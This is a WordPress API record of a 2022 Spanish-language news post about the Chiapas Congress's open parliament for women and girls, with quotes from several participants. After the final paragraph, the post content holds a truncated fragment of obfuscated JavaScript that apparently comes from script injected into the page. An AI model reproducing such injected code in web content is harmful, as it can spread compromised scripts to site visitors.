{"id":967,"date":"2022-03-31T02:56:52","date_gmt":"2022-03-31T02:56:52","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=967"},"modified":"2022-03-31T02:56:54","modified_gmt":"2022-03-31T02:56:54","slug":"congreso-lleva-a-cabo-parlamento-abierto-de-mujeres-y-ninas-2022","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=967","title":{"rendered":"Congreso lleva a cabo Parlamento Abierto de Mujeres y Ni\u00f1as 2022"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-30-at-19.57.57-1024x683.jpeg\" alt=\"\" class=\"wp-image-968\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-30-at-19.57.57-1024x683.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-30-at-19.57.57-300x200.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-30-at-19.57.57-768x512.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-30-at-19.57.57.jpeg 1408w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Tuxtla Guti\u00e9rrez, 30 de marzo de 2022.- la Comisi\u00f3n de Atenci\u00f3n a la Mujer y la ni\u00f1ez, que preside la diputada Floralma G\u00f3mez S\u00e1ntiz, realiz\u00f3 el Parlamento Abierto de Mujeres y Ni\u00f1as en Chiapas 2022. Con dicho foro, busca una transversalidad en la perspectiva de g\u00e9nero, actividad que fue reconocida por cada una de las participantes.<\/p>\n\n\n\n<p>Al respecto, la diputada manifest\u00f3 que esta actividad, tiene 3 ejes estructurales como son: La autonom\u00eda f\u00edsica, autonom\u00eda econ\u00f3mica, e igualdad. Por eso, subray\u00f3, es momento de escuchar diversas voces que, con sus propuestas, puedan ser retomadas en su momento dentro de este congreso.<\/p>\n\n\n\n<p>El presidente de la Junta de Coordinaci\u00f3n Pol\u00edtica (JUCOPO), Yamil Melgar Bravo, recibi\u00f3 la recopilaci\u00f3n de las exposiciones de 40 mujeres y ni\u00f1as participantes, al final de dicho parlamento abierto.<\/p>\n\n\n\n<p>Los legisladores federales chiapanecos, Valeria Santiago Barrientos y Jorge Luis Llaven Abarca, reconocieron el trabajo de la legisladora Floralma G\u00f3mez y subrayaron que este ejercicio es gracias a la lucha de muchas mujeres, cuyo reto es cambiar paradigmas.<\/p>\n\n\n\n<p>Sadia Guadalupe Carcamo Mayen quien expuso el tema de la violencia econ\u00f3mica, anot\u00f3 que el parlamento fue excelente porque es una oportunidad para expresar sus demandas y pidi\u00f3 que se sigan realizando estos espacios, no solo en esta, sino en todas las legislaturas y retomar la iniciativa de la diputada G\u00f3mez S\u00e1ntiz.<\/p>\n\n\n\n<p>Patricia S\u00e1nchez invit\u00f3 a los legisladores a seguir trabajando en los derechos de las mujeres, tambi\u00e9n plante\u00f3 las necesidades que tienen las mujeres migrantes y por ende el enfocar un esfuerzo a favor de ellas, lo que es importante -dijo- es que en este parlamento se dio cabida a diversas generaciones.<\/p>\n\n\n\n<p>Ana Silvia G\u00f3mez S\u00e1nchez, expres\u00f3 en tribuna el tema de los derechos de las mujeres en el contexto, agrario especialmente en las zonas rurales como ind\u00edgenas, as\u00ed tambi\u00e9n reconoci\u00f3 que este parlamento es un buen espacio, con esto se hace visible las demandas y desde el Congreso si ser\u00e1n escuchadas.<\/p>\n\n\n\n<p>Marisol L\u00f3pez Luna, quien expuso el derecho de las mujeres j\u00f3venes ind\u00edgenas, y pidi\u00f3 que se sigan haciendo este tipo de foros, para que puedan tener mayor participaci\u00f3n, es muy importante que las autoridades las volteen a ver como la diputada Floralma G\u00f3mez S\u00e1ntiz, quien empez\u00f3 con foros en los municipios.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Tuxtla Guti\u00e9rrez, 30 de marzo de 2022.- la Comisi\u00f3n de Atenci\u00f3n a la Mujer y la ni\u00f1ez, que preside la diputada Floralma G\u00f3mez S\u00e1ntiz, realiz\u00f3 el Parlamento Abierto de Mujeres y Ni\u00f1as en Chiapas 2022. Con dicho foro, busca una transversalidad en la perspectiva de g\u00e9nero, actividad que fue reconocida por cada una de las &hellip;<\/p>\n","protected":false},"author":2,"featured_media":968,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-967","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/967","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=967"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/967\/revisions"}],"predecessor-version":[{"id":969,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/967\/revisions\/969"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/968"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=967"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=967"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=967"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}